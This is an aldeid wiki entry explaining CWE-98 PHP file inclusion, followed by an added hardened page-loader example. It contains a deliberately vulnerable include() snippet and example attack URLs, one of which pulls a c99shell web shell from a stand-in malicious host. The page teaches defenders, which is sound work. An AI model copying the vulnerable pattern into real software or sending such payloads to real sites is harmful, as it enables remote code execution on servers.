CWE-SANS-Top-25/Risky-resource-management/CWE-98

From aldeid

CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')

Description

File inclusion attacks are specific to the PHP language. They consist of exploiting PHP inclusion statements (include, require, require_once, ...) to include arbitrary pages and commands.

Let's take an example. Suppose a PHP application contains the following code:

<?php
/***
 * index.php?page=news
 * Vulnerable: the page name is taken straight from the query string
 * and concatenated into the include path without any validation.
 */
include($_GET["page"].".php");
?>

A normal use would be to include internal pages:

http://www.site.com/index.php?page=page1
http://www.site.com/index.php?page=page2
http://www.site.com/index.php?page=news

But an attacker could easily exploit it to include unexpected pages within the same application (LFI):

http://www.site.com/index.php?page=admin

or even worse, external pages from another site (RFI):

http://www.site.com/index.php?page=http://www.malicioussite.com/c99shell

Read more: Local File Inclusion and Remote File Inclusion
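The following hardened page loader is an added example, not code from the original wiki page or from aldeid. It replaces the vulnerable include above with an allowlist plus a realpath containment check; the PAGES_DIR location and the page names in the allowlist are assumptions for illustration.

```php
<?php
// Added example: hardened replacement for include($_GET["page"].".php").
// Assumptions (hypothetical): pages live under PAGES_DIR and the
// allowlist holds the application's real page names.
declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';

// The only values of ?page= the application will ever include.
const ALLOWED_PAGES = ['page1', 'page2', 'news'];

/**
 * Resolve a user-supplied page name to a file path, or return null.
 * Anything outside the allowlist (traversal such as "../etc/passwd",
 * null bytes, or a URL such as "http://...") never reaches include().
 */
function resolvePage(string $page): ?string
{
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $page . '.php');
    // Second line of defence: the resolved file must stay inside PAGES_DIR
    // (a stray symlink could otherwise point an allowed name elsewhere).
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$requested = $_GET['page'] ?? 'news';
if (!is_string($requested)) {
    $requested = '';   // arrays or other types are never valid page names
}

$path = resolvePage($requested);
if ($path === null) {
    // Log the rejected value (hex-encoded, so log injection is not possible)
    // for detection, and never echo it back to the client.
    error_log('Rejected page parameter: ' . bin2hex($requested));
    http_response_code(404);
    exit('Page not found');
}

include $path;
```

Setting allow_url_include=Off in php.ini (the PHP default) blocks the RFI case on its own, but only the allowlist stops the LFI case.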

Risk measurement

Weakness Prevalence: Common
Remediation Cost: Low to Medium
Attack Frequency: Often
Consequences: Code execution, Data loss
Ease of Detection: Easy
Attacker Awareness: High
